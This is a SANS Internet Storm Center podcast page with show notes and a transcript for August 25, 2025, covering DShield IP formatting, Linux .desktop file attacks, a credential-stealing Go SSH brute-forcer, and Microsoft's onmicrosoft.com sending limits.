Handler on Duty: Jesse La Grew
Threat Level: green
Podcast Detail
SANS Stormcast Monday, August 25th, 2025: IP Cleanup; Linux Desktop Attacks; Malicious Go SSH Brute Forcer; Onmicrosoft Domain Restrictions
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9584.mp3
IP Cleanup; Linux Desktop Attacks; Malicious Go SSH Brute Forcer; Onmicrosoft Domain Restrictions
00:00
My Next Class
| Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 22nd - Sep 27th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Denver | Oct 4th - Oct 9th 2025 |
The end of an era: Properly formatted IP addresses in all of our data.
When initiall designing DShield, addresses were “zero padded”, an unfortunate choice. As of this week, datafeeds should no longer be “zero padded”.
https://isc.sans.edu/diary/The%20end%20of%20an%20era%3A%20Properly%20formated%20IP%20addresses%20in%20all%20of%20our%20data./32228
.desktop files used in an attack against Linux Desktops
Pakistani attackers are using .desktop files to target Indian Linux desktops.
https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/
Malicious Go Module Disguised as SSH Brute Forcer Exfiltrates Credentials via Telegram
A go module advertising its ability to quickly brute force passwords against random IP addresses, has been used to exfiltrate credentials from the person running the module.
https://socket.dev/blog/malicious-go-module-disguised-as-ssh-brute-forcer-exfiltrates-credentials
Limiting Onmicrosoft Domain Usage for Sending Emails
Microsoft is limiting how many emails can be sent by Microsoft 365 users using the “onmicrosoft.com” domain.
https://techcommunity.microsoft.com/blog/exchange/limiting-onmicrosoft-domain-usage-for-sending-emails/4446167
iTunes
MP3 Download
RSS Feed
Google
Podbean
Amazon Echo
YouTube
Spreaker
Spotify
Discussion
Login here to join the discussion.
| Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 22nd - Sep 27th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Denver | Oct 4th - Oct 9th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Dallas | Dec 1st - Dec 6th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Mar 29th - Apr 3rd 2026 |
| Network Monitoring and Threat Detection In-Depth | Amsterdam | Apr 20th - Apr 25th 2026 |
Podcast Transcript
Hello and welcome to the Monday, August 25th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ulrich, recording today from Baltimore, Maryland. This episode is brought to you by the SANS.edu Undergraduate Certificate Program in Applied Cybersecurity. Well, this weekend only got a quick update for you about some internal changes to the backend of our Internet Storm Center and DShield. websites. We're cleaning up some real old code here. Back when I started 25 or so years ago with collecting the data, it sounded like a great idea back then to sort of zero-pad individual bytes of IP addresses so they all have the same length, are easily sorted. Well, that actually in hindsight turned out to be a real bad idea. It's something that I should have fixed many, many years ago, finally getting around to it. And the main thing that you'll see is in some of the data feeds where we used this zero-padded IP address format, you'll see the more normal dotted decimal format for IP addresses. So that should actually make it easier when it comes to post -processing some of the data. If you still note some of the old format, let me know. It'll take a while for all the sort of legacy data to really be changed over. Well, sometimes it's interesting how attacks that we are sort of used to from the Windows side are bleeding over to other operating systems. The latest example was documented by Cyfirma. They observed what they believe to be a Pakistani hacker group targeting Indian systems using, well, Linux dot desktop files. The target here is in particular Linux BOSS, B -O-S-S. That's a Linux distribution specifically popular in India. Now, dot desktop files are not specific to that distribution. You see them often in Linux. Linux. They're basically these desktop links similar to what you have in Windows with dot URL files, simple text files with essentially a couple parameters. One of the parameters is what command to launch when you click on the icon that represents this particular file. They pretend this to be a PDF, a PDF, but what you're actually clicking on then launches an executable that basically takes over the respective victim's system. Given that this is currently more used in targeted attacks, it's not a huge problem at this point. But we do keep seeing attacks like this trickle down to more sort of commodity attacks. This is simple enough to pull off. If attackers figure out this is effective, they'll probably launch similar attacks on a more broader scale. And Kirill Boychenko with socket.dev gives us another reminder as how careful you have to be when you're running malicious tools. The latest example is a Go module that claims to be an SH Bruteforcer. The module is called Random IP SSH Bruteforce. This tool definitely doesn't really have sort of a legitimate use because specifically designed to scan random IP addresses. So it's not a legitimate pen testing tool that you could focus on a particular IP address range. The reason Go is often used for tools like this is because it's a threading capability and it's really easy to create very fast scanning tools like this in Go, whether malicious or not. The problem with this tool is while it does what it's advertising that it is scanning random IP addresses for user-in-passwords, it's also exfiltrating the users, the attackers credentials to the creator of the tool. As a Microsoft 365 user, if you're setting up a new tenant in order to facilitate testing of the new tenant, Microsoft allows you to send email using the onMicrosoft.com domain. Sadly, as are many things, this has been heavily abused in the past. As for example, it's been used for spam or phishing because it is associated with Microsoft and is often mistaken for an official Microsoft domain. In order to combat this Microsoft will now restrict how many emails you may be sending using that particular domain. This is being rolled out sort of in a step-by fashion starting with very small tenants first. By December 1st of this year, exchange users with less than three exchange seats will be limited and it will be fully rolled out by June next year, at which point users with more than 10,000 seats will also be affected by the same rate limiting. What you're supposed to do instead of using on Microsoft.com is using your own domain, which is usually as a legitimate Microsoft 365 user what you would prefer over on Microsoft .com just in order to represent your brand. Well, and that's it for today. So thanks for listening. Thanks for subscribing, liking and recommending this podcast and talk to you again tomorrow. Bye.
© 2025 SANS™ Internet Storm Center
Developers: We have an API for you! 